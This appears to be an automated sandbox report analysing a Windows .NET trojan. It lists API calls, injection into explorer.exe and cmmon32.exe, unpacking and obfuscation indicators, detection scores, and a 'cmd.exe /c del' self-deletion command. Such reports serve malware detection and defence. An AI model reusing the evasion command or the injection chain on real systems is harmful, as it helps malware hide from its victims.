Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722B80 NtQueryInformationFile,	2_2_01722B80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722AF0 NtWriteFile,	2_2_01722AF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722AB0 NtWaitForSingleObject,	2_2_01722AB0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722D00 NtSetInformationFile,	2_2_01722D00
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722DB0 NtEnumerateKey,	2_2_01722DB0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722C60 NtCreateKey,	2_2_01722C60
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722C00 NtQueryInformationProcess,	2_2_01722C00
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722CF0 NtOpenProcess,	2_2_01722CF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722CC0 NtQueryVirtualMemory,	2_2_01722CC0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722F60 NtCreateProcessEx,	2_2_01722F60
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722FA0 NtQuerySection,	2_2_01722FA0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722E30 NtWriteVirtualMemory,	2_2_01722E30
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722EE0 NtQueueApcThread,	2_2_01722EE0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01723010 NtOpenDirectoryObject,	2_2_01723010
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01723090 NtSetValueKey,	2_2_01723090
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017235C0 NtCreateMutant,	2_2_017235C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017239B0 NtGetContextThread,	2_2_017239B0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01723D70 NtOpenThread,	2_2_01723D70
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01723D10 NtOpenProcessToken,	2_2_01723D10
Source: C:\Windows\explorer.exe	Code function: 3_2_10E29232 NtCreateFile,	3_2_10E29232
Source: C:\Windows\explorer.exe	Code function: 3_2_10E2AE12 NtProtectVirtualMemory,	3_2_10E2AE12
Source: C:\Windows\explorer.exe	Code function: 3_2_10E2AE0A NtProtectVirtualMemory,	3_2_10E2AE0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_043E2C70
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2C60 NtCreateKey,LdrInitializeThunk,	4_2_043E2C60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_043E2CA0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_043E2D10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_043E2DF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_043E2DD0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_043E2EA0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2F30 NtCreateSection,LdrInitializeThunk,	4_2_043E2F30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2FE0 NtCreateFile,LdrInitializeThunk,	4_2_043E2FE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2AD0 NtReadFile,LdrInitializeThunk,	4_2_043E2AD0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2B60 NtClose,LdrInitializeThunk,	4_2_043E2B60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_043E2BF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_043E2BE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E35C0 NtCreateMutant,LdrInitializeThunk,	4_2_043E35C0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E4650 NtSuspendThread,	4_2_043E4650
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E4340 NtSetContextThread,	4_2_043E4340
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2C00 NtQueryInformationProcess,	4_2_043E2C00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2CF0 NtOpenProcess,	4_2_043E2CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2CC0 NtQueryVirtualMemory,	4_2_043E2CC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2D30 NtUnmapViewOfSection,	4_2_043E2D30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2D00 NtSetInformationFile,	4_2_043E2D00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2DB0 NtEnumerateKey,	4_2_043E2DB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2E30 NtWriteVirtualMemory,	4_2_043E2E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2E80 NtReadVirtualMemory,	4_2_043E2E80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2EE0 NtQueueApcThread,	4_2_043E2EE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2F60 NtCreateProcessEx,	4_2_043E2F60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2FB0 NtResumeThread,	4_2_043E2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2FA0 NtQuerySection,	4_2_043E2FA0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2F90 NtProtectVirtualMemory,	4_2_043E2F90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2AB0 NtWaitForSingleObject,	4_2_043E2AB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2AF0 NtWriteFile,	4_2_043E2AF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2BA0 NtEnumerateValueKey,	4_2_043E2BA0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E2B80 NtQueryInformationFile,	4_2_043E2B80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E3010 NtOpenDirectoryObject,	4_2_043E3010
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E3090 NtSetValueKey,	4_2_043E3090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E3D10 NtOpenProcessToken,	4_2_043E3D10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E3D70 NtOpenThread,	4_2_043E3D70
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E39B0 NtGetContextThread,	4_2_043E39B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A360 NtCreateFile,	4_2_0041A360
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A410 NtReadFile,	4_2_0041A410
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A490 NtClose,	4_2_0041A490
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A540 NtAllocateVirtualMemory,	4_2_0041A540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A40A NtReadFile,	4_2_0041A40A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A48A NtClose,	4_2_0041A48A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A53A NtAllocateVirtualMemory,	4_2_0041A53A

Source: GCeHcfCef8.exe, 00000000.00000002.1341566186.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs GCeHcfCef8.exe
Source: GCeHcfCef8.exe, 00000000.00000000.1309987461.0000000000DFC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEWuh.exe< vs GCeHcfCef8.exe
Source: GCeHcfCef8.exe, 00000000.00000002.1345322177.0000000004D49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs GCeHcfCef8.exe
Source: GCeHcfCef8.exe, 00000000.00000002.1348929969.000000000C450000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs GCeHcfCef8.exe
Source: GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000017DD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GCeHcfCef8.exe
Source: GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs GCeHcfCef8.exe
Source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001639000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs GCeHcfCef8.exe
Source: GCeHcfCef8.exe	Binary or memory string: OriginalFilenameEWuh.exe< vs GCeHcfCef8.exe

Source: GCeHcfCef8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: GCeHcfCef8.exe	ReversingLabs: Detection: 45%
Source: GCeHcfCef8.exe	Virustotal: Detection: 55%

Source: GCeHcfCef8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exe
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GCeHcfCef8.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GCeHcfCef8.exe"	Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GCeHcfCef8.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@10/8

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, g7LrKAAAjpDeQiBfvZ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, g7LrKAAAjpDeQiBfvZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.cs	Security API names: _0020.SetAccessControl
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.cs	Security API names: _0020.AddAccessRule
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, g7LrKAAAjpDeQiBfvZ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, g7LrKAAAjpDeQiBfvZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.cs	Security API names: _0020.SetAccessControl
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.cs	Security API names: _0020.AddAccessRule

Source: GCeHcfCef8.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Mutant created: \Sessions\1\BaseNamedObjects\gOIlmKB
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1104:120:WilError_03

Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: GCeHcfCef8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: GCeHcfCef8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: GCeHcfCef8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: EWuh.pdb source: GCeHcfCef8.exe
Source:	Binary string: EWuh.pdbSHA256. source: GCeHcfCef8.exe
Source:	Binary string: cmmon32.pdb source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: GCeHcfCef8.exe, GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: GCeHcfCef8.exe, FormDANHMUC.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.cs	.Net Code: LGMLPCIxtm System.Reflection.Assembly.Load(byte[])
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.cs	.Net Code: LGMLPCIxtm System.Reflection.Assembly.Load(byte[])
Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, -Module-.cs	.Net Code: _202E_202A_200D_200D_200E_202C_206D_202D_200C_200C_206E_206D_206E_202D_200E_206E_200F_200F_202E_202C_200E_206C_206F_202D_200F_200B_202A_202E_200D_206A_200E_202E_202C_200C_200E_200B_206B_202B_206A_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, bU.cs	.Net Code: A8
Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, bU.cs	.Net Code: _202E_206F_202C_200E_200F_202C_202B_206A_202B_200D_200B_206B_202E_200E_202E_200B_206F_202A_206F_202B_206D_200C_202B_206F_202B_202B_202E_206A_206D_202C_206A_206A_206D_200B_202A_202A_200E_200F_200B_200C_202E System.AppDomain.Load(byte[])
Source: 3.2.explorer.exe.1057f840.0.raw.unpack, FormDANHMUC.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 4.2.cmmon32.exe.48bf840.3.raw.unpack, FormDANHMUC.cs	.Net Code: InitializeComponent contains xor as well as GetObject

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A878 push eax; retf	2_2_0041A87D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041EA0F push ss; ret	2_2_0041EA11
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0040E473 pushfd ; iretd	2_2_0040E475
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041D4B5 push eax; ret	2_2_0041D508
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041D56C push eax; ret	2_2_0041D572
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041D502 push eax; ret	2_2_0041D508
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041D50B push eax; ret	2_2_0041D572
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_00414D8C push ecx; retf	2_2_00414D8F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E09AD push ecx; mov dword ptr [esp], ecx	2_2_016E09B6
Source: C:\Windows\explorer.exe	Code function: 3_2_102D09B5 push esp; retn 0000h	3_2_102D0AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_102D0B02 push esp; retn 0000h	3_2_102D0B03
Source: C:\Windows\explorer.exe	Code function: 3_2_102D0B1E push esp; retn 0000h	3_2_102D0B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_10E2C9B5 push esp; retn 0000h	3_2_10E2CAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10E2CB02 push esp; retn 0000h	3_2_10E2CB03
Source: C:\Windows\explorer.exe	Code function: 3_2_10E2CB1E push esp; retn 0000h	3_2_10E2CB1F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043727FA pushad ; ret	4_2_043727F9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0437225F pushad ; ret	4_2_043727F9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0437283D push eax; iretd	4_2_04372858
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043A09AD push ecx; mov dword ptr [esp], ecx	4_2_043A09B6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041E0F6 push ss; ret	4_2_0041E0F7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0040E473 pushfd ; iretd	4_2_0040E475
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041A878 push eax; retf	4_2_0041A87D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041EA0F push ss; ret	4_2_0041EA11
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_00414D8C push ecx; retf	4_2_00414D8F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041D4B5 push eax; ret	4_2_0041D508
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041D56C push eax; ret	4_2_0041D572
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041D502 push eax; ret	4_2_0041D508
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041D50B push eax; ret	4_2_0041D572
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041DFE1 push eax; iretd	4_2_0041DFE2

Source: GCeHcfCef8.exe

Static PE information: 0xC947732C [Sun Jan 3 12:35:56 2077 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.772448962895667

Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, CryDA69PZS9roASDxk.cs	High entropy of concatenated method names: 'NHM8iwgadK', 'iN68X2Ooyu', 'VsQ8fqxquV', 'a6cfHr3Mk6', 'cUsfz8l3Xw', 'Ktw814cF7y', 'q488ZpAI5R', 'wxv8Oo9fl7', 'Dg68hHaB7P', 'mEc8LrEWvN'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.cs	High entropy of concatenated method names: 'uRAhqfK3ay', 'xOfhifsKaa', 'rORh2LBbA7', 'zqbhXoqC6g', 'OE9hFvSslg', 'rb5hfisouD', 'dqth8kZdks', 'ULKhxNAL73', 'hS7hUA8sE7', 'fFUhTbxD5i'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, EIFMoAl4oDSnMK7fyt.cs	High entropy of concatenated method names: 'OuVXEQhCAo', 'SdjXoWyq5p', 'IaFXAWxQF1', 'Hg1XlHRD3x', 'rcdXpy7ByR', 'djIXeHpGA6', 'mFXXuojdBh', 'wIIXVHe6bT', 'ILPXSicrIB', 'bw6XNY7Vw0'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, g7LrKAAAjpDeQiBfvZ.cs	High entropy of concatenated method names: 'H6u2Ji7iUm', 'mS22y603NE', 'nIi2406uRo', 'ku82j2MIeJ', 'pXI2s5QpBn', 'XCo2DqqfQT', 'Lke2v5VGkg', 'FYN2rBHBUn', 'Xum2nEu63y', 'a7n2HX4hB8'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, X012gv2u2cUD49Zhbt.cs	High entropy of concatenated method names: 'Dispose', 'b2RZneInxP', 'XKgOM393dy', 'hN3CCjBg6H', 'zIXZHMpY1y', 'TfWZzei7Si', 'ProcessDialogKey', 'XByO1Oa20s', 'MMcOZX1rAF', 'a2JOOv6OgD'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, SOa20snIMcX1rAF12J.cs	High entropy of concatenated method names: 'Q1EV0Hyqwr', 'wuYVMYMlkI', 'epSV52CCmS', 'YiaVYlC5pp', 'FWUVJN3UQq', 'F0QVkH1QMu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, o3CIWiJtO7McCaovZf.cs	High entropy of concatenated method names: 'isRpKPVM9s', 'DM4pt1lhi2', 'TrOpJ4ORW5', 'IHPpy467ZJ', 'wxxpMbJmKw', 'dhLp5vSDwg', 'm7SpYk0XAX', 'sHGpkB7AUn', 'yU3p6W2655', 'nYVp9a8akb'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, xDRJ5TZ1v3AtSbQZx4g.cs	High entropy of concatenated method names: 'abNSRYWEsj', 'ugVSbJhkte', 'ei6SPvYTSn', 'q1FSEiTxQ2', 'YFASm0CEk6', 'SrhSov3Kr1', 'JqWSghWEZE', 'jqBSAZxevP', 'JfPSl3KmZA', 'pLtSdOUl8T'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, m2i897LlKZlipw7E2m.cs	High entropy of concatenated method names: 'lG2Z87LrKA', 'DjpZxDeQiB', 'E4oZTDSnMK', 'wfyZ3tbLIl', 'sLdZpyOj83', 'F8HZeWiWGA', 'XpCC6d4dDpqpiVIFm6', 'zRshXF0snAgGCmhLya', 'saAZZ6LDHB', 'AjDZhdHJU1'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, yOsJQocmXUmHPXUuc0.cs	High entropy of concatenated method names: 'GDowA1wjeo', 'JBPwlDpE9o', 'mWew0GNXuR', 'J26wMDqlJa', 'snLwYoOqrc', 'k96wk5AMNv', 'i4Iw9iWTQ3', 'LdcwIQhTqb', 'n9pwKqnmSb', 'XEfwBl8E9v'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, IGU6EgOvFdlUefuYca.cs	High entropy of concatenated method names: 'f1OPEsWJT', 'KiHESh9m7', 'TZXoVbnr2', 'CFNgwd2qc', 'eStlm1qOJ', 'APQd90BEj', 'JnQ9wufQtJyZwII272', 'wG6rTwDugooMg0ui7s', 'YWbV0uLHM', 'ORVNLaPlf'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, veinETXm5LENmkkHuT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TUaOnfuMfF', 'p8FOH5w8AT', 'hBwOz6WbIT', 'SVah1NX5Co', 'g87hZV46OJ', 'J0GhOF0HBU', 'IPihhY1Hcj', 'aIkIMG7b3LH22dqiNOt'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, T83d8H0WiWGA1rlfc0.cs	High entropy of concatenated method names: 'pybfqBGSEf', 'W09f2qU0xc', 'jWqfFm3r7i', 'ww3f8o5QU3', 'UeYfxWhw42', 't8JFsesAYh', 'qKlFDJKoZ2', 'Qf9FvYO7gY', 'LAbFrWR6r2', 'TpOFnxKIPe'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, yLIl4FdYPqOOHNLdyO.cs	High entropy of concatenated method names: 'S8kFmBqM2K', 'LuOFgxQH69', 'w1OX5CfGRZ', 'SqvXYwJwNU', 'aqZXkQlDxw', 'XFbX6lwAG5', 'z07X9mrG4E', 'sTdXISQKRr', 'eDEXWx6ACi', 'smQXK53JHw'
